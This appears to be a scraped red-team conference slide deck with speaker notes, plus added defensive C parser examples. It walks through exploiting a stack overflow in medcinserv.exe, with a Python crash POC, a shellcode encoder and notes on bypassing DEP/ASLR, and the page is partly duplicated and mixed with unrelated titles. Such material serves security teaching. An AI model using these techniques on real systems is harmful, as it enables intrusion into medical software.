Software Vulnerability Discovery & Exploitation During Red Team Assessments
Ryan Wincey
rwincey@securifera.com
9/30/2015
Background
• Long term red team assessments
• Persistence with remote access tools
• Looking for alternative means of network propagation or privilege escalation
Identify Targets
• Look for applications that are listening on sockets or running at a higher privilege level
• Windows
  netstat -ano | findstr LISTEN
  tasklist /v | findstr <pid>
• Linux
  netstat -anop | grep LISTEN
  ps -ef | grep <pid>
Static Analysis
• Reverse Engineering Software
– IDA Pro/Hexrays
– Hopper
– Other
• Target Binary
Static Analysis
• Helpful bug hunting tips
– Identify areas where data is introduced from outside of the application
• Command line parameters
• Socket reads
• File reads
• Environment variables
• e.g. read, gets, fread, fgets, recv, recvfrom
Static Analysis
• Helpful bug hunting tips
– Trace those inputs to parsing functions; look for interesting functions and memory operations
• strcpy, strcat
• sprintf, printf
• memcpy
• system
• any custom string or memory copies
Dynamic Analysis
Checklist
• In order to perform dynamic analysis, we will need to ensure that the application will run in our test environment.
• Tips for getting the application to run:
– Zip up support files in the same directory (7za, zip)
– Listdlls.exe, ldd - loaded libraries
– Handle.exe, /proc/<pid> - open files
– Procmon.exe - identify registry keys
– Read log files - track down missing files or registry settings
Analyzing Process Memory
• Compare the running process environment to your test environment.
• Windows
  procdump.exe /accepteula -ma <pid> <dump file>
• Linux
  gdb attach <pid>
Crash Dumps
• If you crash the application and want to collect crash dumps:
• Windows: configure user-mode dumps under the registry key
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps
  using the values DumpFolder, DumpCount, DumpType and CustomDumpFlags
• Linux
  ulimit -c unlimited
Case Study: medcinserv.exe
IAVM Notice Number: 2015-A-0127
• Identify target and binary location
• Static analysis using IDA Pro and HexRays decompiler
• Locate additional dependencies
• Query service details in registry
• Set up a nearly identical environment
– Operating system
– File system
– Service registration
– Debugging tools
– Scripting support
• Set breakpoint on our vulnerable function
• POC Skeleton
– Define protocol
  [ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ]
– Choose implementation
  Python, Ruby, PowerShell, C
– Code up the boilerplate / use a template
  Socket connect, send, recv, formatting
• POC Skeleton (Python)

import socket
import struct
import sys


def send(type, pack_len, data=None):
    # Warn on an out-of-range length but send it anyway: the server's
    # handling of the length field is exactly what is being probed.
    if pack_len < 6 or pack_len > 0x3d090:
        print("Length must be between 6 and 0x3d090 bytes.")
    # Set the type (2-byte big-endian)
    buf = struct.pack('>h', type)
    # Send length, must be less than 0x3d090, can be negative (4-byte big-endian)
    buf += struct.pack('>i', pack_len)
    # Send data only when a positive length was declared
    if pack_len > 0:
        buf += data
    try:
        csock.send(buf)
    except socket.error:
        pass


if len(sys.argv) == 3:
    (progname, host, port) = sys.argv
else:
    print('Usage: {0} host port'.format(sys.argv[0]))
    sys.exit(1)

csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect((host, int(port)))
csock.settimeout(1)
print("[+] connected to server.")

# Try things
i = 238
data = b"1," * 1000   # the server parses this field as an integer array
print("[+] sending data.")
send(i, len(data) + 6, data)
csock.close()
print("[+] goodbye")
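The receiving side of this protocol is where the bug lives, so here is the set of checks a server-side parser needs in order to survive what the POC sends, written as an added example (not code from the slides or from medcinserv.exe). It parses the [ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ] framing, rejecting negative, undersized, oversized and truncated length fields before reading any payload (the POC's send() deliberately lets such values through), and then parses the comma-separated integer array while capping the element count at the destination's capacity, which is the check an integer-array buffer overflow is missing. The wire layout and the 0x3d090 limit come from the slides; MAX_INTS, the status codes and the sample messages in main() are assumptions constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Added example: bounds-checked parser for the POC's framing.
 * MAX_INTS (destination capacity) is an assumption for this example. */
#define MAX_PACKET_LEN 0x3d090u   /* total-length limit quoted on the slide */
#define HEADER_LEN     6u         /* 2-byte type + 4-byte length */
#define MAX_INTS       256u       /* assumed capacity of the integer array */

enum parse_status {
    PARSE_OK = 0,
    PARSE_SHORT,      /* buffer shorter than the header or the declared length */
    PARSE_BAD_LEN,    /* negative, undersized or oversized length field */
    PARSE_TOO_MANY,   /* more integers than the destination can hold */
    PARSE_BAD_INT     /* malformed or out-of-range decimal integer */
};

struct message {
    int16_t type;
    uint32_t data_len;
    const uint8_t *data;
};

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Validate the header before touching any payload. The POC packs the length
 * as a signed 32-bit value, so anything with the sign bit set is rejected. */
enum parse_status parse_header(const uint8_t *buf, size_t buf_len, struct message *out) {
    if (buf == NULL || out == NULL || buf_len < HEADER_LEN) return PARSE_SHORT;
    uint32_t raw = be32(buf + 2);
    if (raw > (uint32_t)INT32_MAX) return PARSE_BAD_LEN;            /* negative as signed */
    if (raw < HEADER_LEN || raw > MAX_PACKET_LEN) return PARSE_BAD_LEN;
    uint32_t data_len = raw - HEADER_LEN;
    if (data_len > buf_len - HEADER_LEN) return PARSE_SHORT;         /* declared more than received */
    out->type = (int16_t)(((uint16_t)buf[0] << 8) | buf[1]);
    out->data_len = data_len;
    out->data = buf + HEADER_LEN;
    return PARSE_OK;
}

/* Parse the comma-separated decimal list ("1,2,3,") into a fixed-size array.
 * The element count is checked against the capacity before every store. */
enum parse_status parse_int_array(const uint8_t *data, uint32_t data_len,
                                  uint32_t *out, size_t cap, size_t *count) {
    size_t n = 0;
    uint32_t i = 0;
    while (i < data_len) {
        uint32_t value = 0;
        size_t digits = 0;
        if (n >= cap) return PARSE_TOO_MANY;
        while (i < data_len && data[i] >= '0' && data[i] <= '9') {
            uint32_t d = (uint32_t)(data[i] - '0');
            if (value > (UINT32_MAX - d) / 10u) return PARSE_BAD_INT;  /* would wrap */
            value = value * 10u + d;
            i++;
            digits++;
        }
        if (digits == 0) return PARSE_BAD_INT;   /* empty element or junk byte */
        out[n++] = value;
        if (i < data_len) {
            if (data[i] != ',') return PARSE_BAD_INT;
            i++;                                  /* a trailing comma is allowed */
        }
    }
    *count = n;
    return PARSE_OK;
}

/* Header validation followed by the bounded array parse. */
enum parse_status check_message(const uint8_t *buf, size_t buf_len,
                                uint32_t *ints, size_t cap, size_t *count) {
    struct message m;
    enum parse_status st = parse_header(buf, buf_len, &m);
    if (st != PARSE_OK) return st;
    return parse_int_array(m.data, m.data_len, ints, cap, count);
}

int main(void) {
    /* Constructed sample: type 238, total length 12, payload "1,2,3," */
    static const uint8_t good[] = {0x00, 0xEE, 0x00, 0x00, 0x00, 0x0C,
                                   '1', ',', '2', ',', '3', ','};
    /* Constructed sample: same type, length field -2 */
    static const uint8_t negative[] = {0x00, 0xEE, 0xFF, 0xFF, 0xFF, 0xFE};
    uint32_t ints[MAX_INTS];
    size_t count = 0;
    printf("good: status %d, %zu ints\n",
           (int)check_message(good, sizeof good, ints, MAX_INTS, &count), count);
    printf("negative length: status %d\n",
           (int)check_message(negative, sizeof negative, ints, MAX_INTS, &count));
    return 0;
}
```

When reviewing a decompiled parser for this kind of service, these are the four checks to look for: the length is compared as a signed value, it is compared against the bytes actually received, the integer count is compared against the destination size on every element, and the digit accumulation cannot wrap.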
• We own EIP
• Our target environment, Windows 7 SP1, has DEP, ASLR, and SafeSEH on all OS libraries.
• medcinserv.exe doesn't have any built-in protections.
• Bypass DEP by changing the execution permissions of the stack dynamically.
• Change permissions using ROP chain composed of gadgets from the medcinserv binary.
• Bypass ASLR because ROP gadgets in medcinserv binary are static.
• NULL bytes are allowed since it’s an integer array buffer overflow.
• ROP gadgets generated for VirtualAlloc
• Resolve VirtualAlloc using GetModuleHandle and GetProcAddress
• Exploit Design Structure
• Shellcode to String Array Function

import struct

data = ""


def add_shellcode(sc):
    # sc is a bytes object; each 4-byte chunk becomes one decimal integer
    global data
    # Number of 4-byte integers needed to hold the shellcode
    shellcode_len = len(sc)
    iterator = shellcode_len // 4
    if shellcode_len % 4 > 0:
        iterator += 1
    counter = 0
    for i in range(iterator):
        entry = sc[(i * 4):(i * 4) + 4]
        # Pad the final chunk to four bytes with NOPs (0x90)
        len_entry = len(entry)
        if len_entry < 4:
            entry += b"\x90" * (4 - len_entry)
        # Append the little-endian integer as a decimal string
        data += str(struct.unpack("<I", entry)[0]) + ","
        counter += 1
    return counter
DEMO
Test Exploit
• Test in as nearly identical an environment as possible
• Non-critical systems, preferably when users are away
• Make sure to get permission
• Get more shellz 
Reporting
• US CERT
• MITRE
• NIST
QUESTIONS?
rwincey@securifera.com

Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New Features
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....
 
Folding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a seriesFolding Cheat Sheet #4 - fourth in a series
Folding Cheat Sheet #4 - fourth in a series
 

Software vulnerability discovery and exploitation during red team assessments

  • 1. Software Vulnerability Discovery & Exploitation During Red Team Assessments
       Ryan Wincey, rwincey@securifera.com, 9/30/2015
  • 2. Background
       - Long term red team assessments
       - Persistence with remote access tools
       - Looking for alternative means of network propagation or privilege escalation
  • 3. Identify Targets
       - Look for applications that are listening on sockets or running at a higher privilege level
       - Windows: netstat -ano | findstr LISTEN
  • 4. Identify Targets
       - Look for applications that are listening on sockets or running at a higher privilege level
       - Windows: tasklist /v | findstr <pid>
  • 5. Identify Targets
       - Look for applications that are listening on sockets or running at a higher privilege level
       - Linux: netstat -anop | grep LISTEN
                ps -ef | grep <pid>
  • 6. Static Analysis
       - Reverse engineering software: IDA Pro/Hex-Rays, Hopper, other
       - Target binary
  • 7. Static Analysis
       - Helpful bug hunting tips: identify areas where data is introduced from outside of the application
         * Command line parameters
         * Socket reads
         * File reads
         * Environment variables
         * i.e. read, gets, fread, fgets, recv, recv_from
  • 8. Static Analysis
       - Helpful bug hunting tips: trace those inputs to parsing functions; look for interesting functions and memory operations
         * strcpy, strcat
         * sprintf, printf
         * memcpy
         * system
         * any custom string or memory copies
  • 9. Dynamic Analysis Checklist
       - In order to perform dynamic analysis, we will need to ensure that the application will run in our test environment.
       - Tips for getting the application to run:
         * Zip up support files in the same directory (7za, zip)
         * Listdlls.exe, ldd: loaded libraries
         * Handle.exe, /proc/<pid>: open files
         * Procmon.exe: identify registry keys
         * Read log files: track down missing files or registry settings
  • 10. Analyzing Process Memory
       - Comparing the running process environment to your test environment.
       - Windows: procdump.exe /accepteula -ma <pid> <dump file>
       - Linux: gdb attach <pid>
  • 11. Crash Dumps
       - In the event that you crash the application and want to collect crash dumps.
       - Windows: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LocalDumps
         (values: DumpFolder, DumpCount, DumpType, CustomDumpFlags)
       - Linux: ulimit -c unlimited
  • 12. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Identify target and binary location
  • 13. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Identify target and binary location
  • 14. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Static analysis using IDA Pro and the Hex-Rays decompiler.
  • 15. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Static analysis using IDA Pro and the Hex-Rays decompiler.
  • 16. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Static analysis using IDA Pro and the Hex-Rays decompiler.
  • 17. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Locate additional dependencies
  • 18. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Locate additional dependencies
  • 19. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Locate additional dependencies
  • 20. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Query service details in registry
  • 21. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Set up as nearly identical an environment as possible:
         * Operating system
         * File system
         * Service registration
         * Debugging tools
         * Scripting support
  • 22. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Set breakpoint on our vulnerable function
  • 23. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Set breakpoint on our vulnerable function
  • 24. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - POC Skeleton
         * Define protocol: [ Message Type : 2 bytes ][ Data Length : 4 bytes ][ Data ]
         * Choose implementation: Python, Ruby, PowerShell, C
         * Code up boilerplate stuff / use template: socket connect, send, recv, formatting
  • 25. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - POC Skeleton (Python 2)

            import socket
            import struct
            import sys

            def send(type, pack_len, data=None):
                if pack_len < 6 or pack_len > 0x3d090:
                    print "Length must be between 6 and 0x3d090 bytes."
                # Set the type
                buf = struct.pack('>h', type)
                # Send length, must be less than 0x3d090, can be negative
                buf += struct.pack('>i', pack_len)
                # Send data
                if pack_len > 0:
                    buf += data
                try:
                    # Send data
                    csock.send(buf)
                except:
                    pass

            if len(sys.argv) == 3:
                (progname, host, port) = sys.argv
            else:
                print 'Usage: {0} host port'.format(sys.argv[0])
                exit(1)

            csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            csock.connect((host, int(port)))
            csock.settimeout(1)
            print "[+] connected to server."

            # Try things
            i = 238
            data = "1," * 1000      # integer array payload
            print "[+] sending data."
            send(i, len(data) + 6, data)
            csock.close()
            print "[+] goodbye"

  • 26. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - We own EIP
  • 27. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Our target environment, Windows 7 SP1, has DEP, ASLR, and SafeSEH on all OS libraries.
       - Medcinserv.exe doesn't have any built-in protections.
  • 28. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Bypass DEP by changing the execution permissions of the stack dynamically.
       - Change permissions using a ROP chain composed of gadgets from the medcinserv binary.
       - Bypass ASLR because ROP gadgets in the medcinserv binary are static.
       - NULL bytes are allowed since it's an integer array buffer overflow.
  • 29. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - ROP gadgets generated for VirtualAlloc
       - Resolve VirtualAlloc using GetModuleHandle and GetProcAddress
  • 30. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Exploit design structure
  • 31. Case Study: medcinserv.exe (IAVM Notice Number: 2015-A-0127)
       - Shellcode to string array function

            def add_shellcode( sc ):
                global data
                # Determine the iterator
                shellcode_len = len(sc)
                iterator = shellcode_len / 4
                if shellcode_len % 4 > 0:
                    iterator += 1
                counter = 0
                for i in range( int( iterator ) ):
                    entry = sc[ (i*4) : (i*4)+4 ]
                    # Make sure length is four bytes
                    len_entry = len(entry)
                    if len( entry ) < 4:
                        entry += "\x90" * ( 4 - len_entry)
                    data += str(struct.unpack("<I", entry )[0]) + ","
                    counter += 1
                return counter

  • 32. DEMO
  • 33. Test Exploit
       - Test in as nearly identical an environment as possible
       - Non-critical systems, preferably when users are away
       - Make sure to get permission
       - Get more shellz
  • 34. Reporting
       - US CERT
       - MITRE
       - NIST
  • 35. QUESTIONS? rwincey@securifera.com
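The bug the case study turns on is the receive side of the message format on slide 24 (note 14 describes the loop that converts a comma-separated integer list into a fixed-size stack array without checking its index, and the POC comment notes that the length field "can be negative"). As an added example, not code from the slides or from the vendor, here is what a bounds-checked receiver for that format looks like in C: the header length is validated as an unsigned value against the frame's minimum and maximum, the integer list is parsed from a length-delimited buffer with every store checked against the array capacity, and the POC's "1," * 1000 payload is refused instead of overrunning the stack. MAX_ENTRIES, the function names and the sample messages are assumptions made for this example.

```c
/* Added example, not code from the slides: a bounds-checked receiver for the
 * framing on slide 24, [type:2][length:4][data], and for the comma-separated
 * integer array that note 14 says message type 238 carries.  MAX_ENTRIES, the
 * function names and the sample inputs are assumptions made for this example. */
#include <limits.h>
#include <stdint.h>
#include <string.h>

#define HDR_LEN       6u        /* 2-byte type + 4-byte length */
#define MAX_PACK_LEN  0x3d090u  /* upper bound quoted in the POC script */
#define MAX_ENTRIES   32        /* assumed capacity of the integer array */
#define MSG_INT_ARRAY 238       /* message type used by the POC script */

struct frame { uint16_t type; const uint8_t *data; size_t data_len; };

/* Read the big-endian header and check that the declared length is in range
 * and fully present.  The length is handled as unsigned, so a "negative"
 * value (top bit set) fails the upper-bound check instead of passing. */
static int parse_frame(const uint8_t *buf, size_t buf_len, struct frame *out)
{
    if (!buf || !out || buf_len < HDR_LEN) return -1;
    uint32_t pack_len = ((uint32_t)buf[2] << 24) | ((uint32_t)buf[3] << 16) |
                        ((uint32_t)buf[4] << 8)  |  (uint32_t)buf[5];
    if (pack_len < HDR_LEN || pack_len > MAX_PACK_LEN) return -1; /* out of range */
    if (pack_len - HDR_LEN > buf_len - HDR_LEN) return -1;        /* truncated */
    out->type = (uint16_t)((buf[0] << 8) | buf[1]);
    out->data = buf + HDR_LEN;
    out->data_len = pack_len - HDR_LEN;
    return 0;
}

/* The loop note 14 describes stores converted numbers until a zero appears and
 * never compares its index to the array size.  Here the input is
 * length-delimited (no NUL needed), every store is checked against cap, digit
 * accumulation is checked for overflow, and the loop also ends at end-of-data.
 * Returns the number of entries stored, or -1 on oversize or malformed input. */
static int int_array_checked(const uint8_t *d, size_t len, long *dst, size_t cap)
{
    size_t i = 0, n = 0;
    while (i < len) {
        int neg = (d[i] == '-');
        size_t start = (i += (size_t)neg);
        long v = 0;
        while (i < len && d[i] >= '0' && d[i] <= '9') {
            int digit = d[i++] - '0';
            if (v > (LONG_MAX - digit) / 10) return -1;  /* value overflows long */
            v = v * 10 + digit;
        }
        if (i == start) return -1;      /* no digits where a number was due */
        if (neg) v = -v;
        if (v == 0) break;              /* zero terminates the list */
        if (n >= cap) return -1;        /* array full: refuse, never overrun */
        dst[n++] = v;
        if (i < len && d[i++] != ',') return -1;   /* only ',' separates values */
    }
    return (int)n;
}

/* Dispatch one framed message; only the integer-array command is handled. */
int handle_message(const uint8_t *buf, size_t len, long *dst, size_t cap)
{
    struct frame f;
    if (parse_frame(buf, len, &f) != 0 || f.type != MSG_INT_ARRAY) return -1;
    return int_array_checked(f.data, f.data_len, dst, cap);
}

/* Wrap an ASCII payload in a frame (helper constructed for the samples). */
size_t build_frame(uint16_t type, const char *payload, uint8_t *out, size_t cap)
{
    size_t plen = strlen(payload), total = HDR_LEN + plen;
    if (total > cap) return 0;
    out[0] = (uint8_t)(type >> 8);   out[1] = (uint8_t)type;
    out[2] = (uint8_t)(total >> 24); out[3] = (uint8_t)(total >> 16);
    out[4] = (uint8_t)(total >> 8);  out[5] = (uint8_t)total;
    memcpy(out + HDR_LEN, payload, plen);
    return total;
}

static long g_vals[MAX_ENTRIES];             /* destination for the samples */
long demo_value(size_t i) { return g_vals[i]; }

/* Constructed sample: a well-formed message carrying three values. */
int demo_benign(void)
{
    uint8_t msg[32];
    size_t n = build_frame(MSG_INT_ARRAY, "7,42,-3,0", msg, sizeof msg);
    return handle_message(msg, n, g_vals, MAX_ENTRIES);           /* 3 */
}

/* Constructed sample: the POC's "1," * 1000 payload; the checked parser
 * refuses it instead of spilling 1000 longs into a 32-entry array. */
int demo_oversized(void)
{
    static char payload[2001];
    static uint8_t msg[HDR_LEN + 2000];
    for (int i = 0; i < 1000; i++) { payload[2 * i] = '1'; payload[2 * i + 1] = ','; }
    size_t n = build_frame(MSG_INT_ARRAY, payload, msg, sizeof msg);
    return handle_message(msg, n, g_vals, MAX_ENTRIES);           /* -1 */
}

/* Constructed sample: a length field with its top bit set (negative if read
 * as a signed int, as the POC comment notes); parse_frame rejects it. */
int demo_negative_length(void)
{
    uint8_t msg[8] = { 0x00, 0xEE, 0xFF, 0xFF, 0xFF, 0xF0, '1', ',' };
    return handle_message(msg, sizeof msg, g_vals, MAX_ENTRIES);  /* -1 */
}
```

The two checks that matter are the ones the original parser lacked: the length field is compared against both bounds as an unsigned quantity, and the store into the array is guarded by `n >= cap` on every iteration rather than relying on the input to end with a zero. Either check alone would have stopped the POC from reaching EIP.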

Editor's Notes

  1. I work in Charleston as a red team operator. These tend to be long-term operations. Because of increased defensive mechanisms we've started looking at additional ways to move laterally through a compromised network.
  2. Using whatever backdoors, RATs, etc, pop open a shell and start looking around. The level of access you have on the box you are on will determine how many of these things you can get. If you are assessing an enterprise, good chance that the applications will be installed on a number of other systems.
  3. Match the PIDs of listening processes to their binaries using tasklist. If it's a service, sc query and sc qc are also useful in tracking down the location without having to search manually for the binary.
  4. Same process applies to linux.
  5. Depending on what's available to you, you might only be able to perform static analysis. If this is the case, the only thing you really need is the application binary. The Hex-Rays decompiler helps here.
  6. The biggest question I get about how to begin searching for bugs in software is where to start looking. Start with the entry points into the application. Check all parsing and sanitization routines for data coming into the application from the outside.
  7. Most buffer overruns occur around some sort of copy functions. Analyze any occurrences of these that are being used on incoming or controlled data. Check bounds checking around these functions and custom copy routines. Check if you control the indexes of any copies into memory or the sizes of memory copies.
  8. If you have the ability to set up a test environment and perform dynamic analysis, some of these tools will help track down the necessary files. Run them to enumerate what files you need off of the system, then either download them from the compromised machine or locate them offline. Whenever using Sysinternals utilities, remember to add /accepteula; otherwise a popup asks for confirmation.
  9. The dumps created by procdump.exe can be loaded into WinDbg (File -> Open Crash Dump). This allows you to check whether the runtime libraries are the same as in your test environment. Also check whether any other mitigations are in place, such as HIPS (EMET, HBSS).
  10. If you have the ability to start and stop the process without adverse effect but don't have the ability to debug it, you can turn on crash dump capabilities: https://msdn.microsoft.com/en-us/library/windows/desktop/bb787181%28v=vs.85%29.aspx On Linux, set the core dump size to unlimited; core dumps can be loaded into gdb in a test environment.
  11. As described in the previous slides, we identify a service running on a compromised system and track down the running binary.
  12. Since we know this application is running as a service listening on port 8080, let's start our analysis by finding usages of the function "recv" from the imported Winsock library. The code following this receive will likely be the parsing functions for whatever data was sent to the application over a socket connection. We found two usages of the recv function: what appears to be a recv for a header, followed by a recv for the data. The decompiled version is shown here for easier readability.
  13. As presumed, the calling function of the recv wrapper function, switches based on the command type, and parses the particular message.
  14. Much reversing later, I come across the parsing function for msg type 239 (actually 238, because the parsing code adds 1). We have a loop that iterates over a user-supplied string that is formatted as an integer array. Inside the loop, a call is made to "char_to_long_buggy", which converts the next number in our string to a long and then stores the return value at the next index in our integer array on the stack. As can be seen here, the loop iterates until the number returned from "char_to_long_buggy" is zero. The problem is that there is no bounds checking on this loop to ensure that the number of user-supplied integers does not exceed the size of the integer array that holds them. At this point, I have enough to warrant setting up a test environment to confirm whether or not this is an exploitable vulnerability.
  15. Run Sysinternals ListDlls.exe and Handle.exe on the PID retrieved from the other utilities. No additional third-party libraries are loaded (other than McAfee HBSS). Glean information from the log file. This lets us know that most of the necessary files are in the AHLTA Data directory.
  18. Since this particular binary is a service, let's also grab the registry information for the service so we can set it up the same way in our test lab. Registry information for services resides at "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"; add /s to query recursively.
  19. Set up as nearly identical an environment to your target as possible: operating system, dependencies, service registration. This is so we don't have to test on live systems.
  20. Using the files and information I gleaned from the compromised system, I set up my test environment. I replicated the directory structure, added the medcinserv application as a service, started the service, and attached to it using Immunity Debugger (File -> Attach). Using my disassembly as a reference, I set a breakpoint at address 0x0425E80, the function that contains the stack overflow.
  22. From the IDA disassembly around the recv function calls, we saw that the protocol is structured as follows. Using your favorite language, start coding up the boilerplate code necessary to connect to a socket and send raw bytes.
  23. Set up the socket code and the correct protocol format. As mentioned on slide 14, the bug involves overflowing a statically allocated integer array.
  24. When we execute our script, we should trigger an access violation in our debugger, as can be seen here. Our EIP (Extended Instruction Pointer), the register that points to the next address to be executed, has been overwritten with one of the 1's we supplied in our script, so we have verified that our bug exists and can be reached.
  25. Now that we know we control EIP, we need to see what protections are in place so we can start planning what needs to be done to construct a reliable exploit. We can use the "modules" function in Corelan's mona.py script to identify what libraries have been loaded and what compile-time protections they have. From the output here, we can see that the medcinserv binary was not compiled with any protections. This means we literally need one "JMP ESP" or "PUSH ESP; RET" instruction to gain control of execution. This is assuming that the system-wide DEP setting is not Always On; on Windows 7 it is Opt-In by default. To make things more interesting, we'll assume the system is Always On and we have to bypass DEP and ASLR.
  26. The ability to put NULL bytes in our buffer is imperative since we will need to use addresses from our binary for the ROP chain, used to bypass DEP.
  27. Using mona.py we have generated the necessary gadgets to call VirtualAlloc. Unfortunately, the address of VirtualAlloc was not found in our binary's import table. To make the exploit more reliable across different versions of kernel32.dll, we need to resolve the address of VirtualAlloc at runtime. We can do this using GetModuleHandle and GetProcAddress.
  29. We need to add a function that will convert our shellcode to a string array of integers. It will simply loop through the byte array and convert every four bytes to its integer equivalent, convert it to a string, and add it to the comma delimited list.
  30. From here you basically just have to grind through the list of available gadgets and piece everything together based on the exploit design.
  31. Before you ever throw this exploit on a live penetration test, make sure you test it thoroughly in your lab. Make sure your red team lead and any white team leads give you permission before you test on live systems. Then add it to your arsenal.
  32. Depending on your customers and the install base of the software you are looking at, the reporting will likely differ. For the case study given here, we felt it best to notify Cybercom, since the affected software was GOTS.